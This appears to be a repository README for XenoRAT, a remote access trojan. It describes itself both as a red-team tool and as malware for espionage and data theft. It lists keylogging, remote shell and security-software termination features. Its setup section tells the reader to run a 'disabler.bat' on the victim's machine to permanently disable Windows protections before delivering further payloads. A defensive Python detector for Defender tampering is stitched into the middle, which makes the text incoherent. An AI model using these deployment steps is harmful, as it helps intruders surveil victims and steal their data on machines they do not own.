XenoRAT is an advanced C2 (Command & Control) framework designed for red team operations,
enabling stealthy persistence, lateral movement, and post-exploitation in
authorized engagements.
XenoRAT is a sophisticated Remote Access Trojan (RAT) used by cybercriminals and advanced persistent threat (APT) groups to infiltrate and control target systems. Once deployed on an infected machine, XenoRAT grants the attacker full remote control, enabling them to conduct a wide range of malicious activities without the knowledge or consent of the user. Typically, XenoRAT is employed for espionage, data theft, and surveillance, making it a highly dangerous tool for cybercriminals seeking to exfiltrate sensitive information or disrupt organizational operations.
- 🔒 Secure Encrypted Communications: XenoRAT employs robust encryption protocols to secure the communication between the compromised system and the attacker's command-and-control (C2) server, ensuring stealthy and secure remote access.
- 🖥️ Remote Desktop Control: Attackers can take full control of the infected system’s desktop, allowing them to operate the device as though they were physically present, without detection.
- 📁 File System Management: XenoRAT enables attackers to browse, upload, download, and manipulate files on the victim’s system, facilitating data theft or the deployment of additional malicious payloads.
- 🔄 Process Management: The malware provides the ability to monitor and control running processes on the infected system, including terminating security software or executing malicious processes.
- 📊 System Monitoring: XenoRAT allows real-time monitoring of system activity, gathering critical data such as hardware specifications, running applications, and network activity to help attackers adjust their tactics.
- 🛠️ Remote Shell Access: Attackers can gain command-line access to the system, enabling them to execute arbitrary commands and scripts, further compromising the target’s security.
- 📝 Keylog Management: XenoRAT can log keystrokes on the infected machine, allowing attackers to capture sensitive information like passwords, messages, and other confidential data.
- 🔌 Plugin Support: The malware supports modular plugins, enabling the attacker to add new capabilities to the RAT, such as additional surveillance tools, backdoors, or advanced exfiltration methods.
- 🌐 Cross-Platform Compatibility: XenoRAT is designed to work across a wide range of operating systems, including Windows, macOS, and Linux, making it a versatile tool for attackers targeting diverse environments.
- Clone the repository into your desired directory:

  ```
  git clone https://github.com/jcrvnx/XenoRAT.git
  ```

- After cloning, navigate into the XenoRAT directory using your command line interface (like Git Bash, Command Prompt, or PowerShell):

  ```
  cd XenoRAT
  ```

- Run `disabler.bat` as Administrator to disable Windows security measures:
  - For the attacker's machine: Manually disable real-time protection to avoid detection during compilation.
  - For the target machine: Required to bypass security protections on the victim's system.

  ```
  # Right-click disabler.bat and select "Run as administrator"
  disabler.bat
  ```

  This script (`Disabler.bat`) is designed to permanently disable security measures (including real-time protection) on a target Windows machine, allowing further payload deployment.

  Before operation, ensure your own machine has:
  - Real-time protection manually disabled
  - Security software temporarily turned off

  Failure to do this may result in your system quarantining the malicious files during development/transfer.

  - First Execution: Run `Disabler.bat` on the victim's system to:
    - This will automatically erase, disable and bypass the security measures and other protections PERMANENTLY.
  - Payload Delivery: Only after successful execution of `Disabler.bat` should you:
    - Transfer/execute additional malicious files
    - Begin further exploitation
    - You can then delete the malicious file, as it has already been injected into the victim's computer.

- The script will require a system reboot to apply the changes. Allow your system to restart.

- After the system reboots, navigate back to the XenoRAT directory and run the server executable:

  ```
  # Double-click xeno-rat-server.exe or run it from the command line
  xeno rat server.exe
  ```

- Done. Enjoy the show.
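From the defender's side, the sequence described above (security settings switched off by a script, followed by a reboot) can be hunted for in Windows event logs. The following is an added example, not code from the XenoRAT repository: it assumes the disabling step surfaces as Microsoft Defender Operational events 5001, 5007 or 5013 and the reboot as System event 1074, and the host names and event records are constructed.

```python
import re
from datetime import datetime, timedelta

# Defender Operational log: 5001 = real-time protection disabled,
# 5007 = configuration changed, 5013 = tamper protection blocked a change.
DEFENDER, SYSTEM = "Microsoft-Windows-Windows Defender/Operational", "System"
NEW_VALUE = re.compile(r"New value:.*\\(Disable\w+)\s*=\s*0x1\b", re.I)

# Constructed sample events (not taken from a real host); System 1074 = restart initiated.
EVENTS = [
    ("2024-05-01T10:00:05", "WS-01", DEFENDER, 5007,
     r"Old value: Default\DisableRealtimeMonitoring = 0x0 New value: "
     r"HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = 0x1"),
    ("2024-05-01T10:00:06", "WS-01", DEFENDER, 5001, "Real-time protection is disabled."),
    ("2024-05-01T10:03:40", "WS-01", SYSTEM, 1074, "restart initiated"),
    ("2024-05-01T11:00:00", "WS-02", DEFENDER, 5007,
     r"Old value: Default\SignatureUpdateInterval = 0x0 New value: "
     r"HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates\SignatureUpdateInterval = 0x8"),
    ("2024-05-01T12:00:00", "WS-03", DEFENDER, 5013, "Tamper protection blocked a change."),
    ("2024-05-01T15:00:00", "WS-03", SYSTEM, 1074, "restart initiated"),
]

def tamper_reason(channel, event_id, message):
    """Return a short reason if the event shows Defender being weakened, else None."""
    if channel != DEFENDER:
        return None
    if event_id == 5001:
        return "real-time protection disabled"
    if event_id == 5013:
        return "tamper protection blocked a change"
    if event_id == 5007:
        m = NEW_VALUE.search(message)  # only Disable* settings switched on count
        return f"{m.group(1)} set to 1" if m else None
    return None

def detect(events, window=timedelta(minutes=15)):
    """Per host: tamper reasons, raised to 'high' when a restart follows within window."""
    findings = {}
    for ts, host, channel, eid, msg in sorted(events):
        t = datetime.fromisoformat(ts)
        reason = tamper_reason(channel, eid, msg)
        if reason:
            f = findings.setdefault(host, {"reasons": [], "last": t, "severity": "medium"})
            f["reasons"].append(reason)
            f["last"] = t
        elif channel == SYSTEM and eid == 1074 and host in findings:
            if t - findings[host]["last"] <= window:
                findings[host]["severity"] = "high"
    return {h: (f["severity"], f["reasons"]) for h, f in findings.items()}
```

Benign configuration changes (WS-02) are ignored, and a tamper event with no nearby restart (WS-03) stays at medium severity.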
INFECTING MY OWN PC with XENO RAT
🐀XenoRAT(Remote Administration Tool)
OPERATION SECURITY NOTICE:
- Unauthorized Access is ILLEGAL: Using this tool and wordlist against networks you do NOT own or have explicit written permission to test is a CRIMINAL OFFENSE in the Philippines (RA 10175 Cybercrime Prevention Act) and most other jurisdictions.
- NO RESPONSIBILITY: The creators and contributors of this guide and `XenoRAT` repository are NOT RESPONSIBLE for any illegal activities, misuse, or damage caused by these tools.
- USE AT YOUR OWN EXTREME RISK: You are solely responsible for your actions. Understand the laws and ethical implications before proceeding. Think before you type.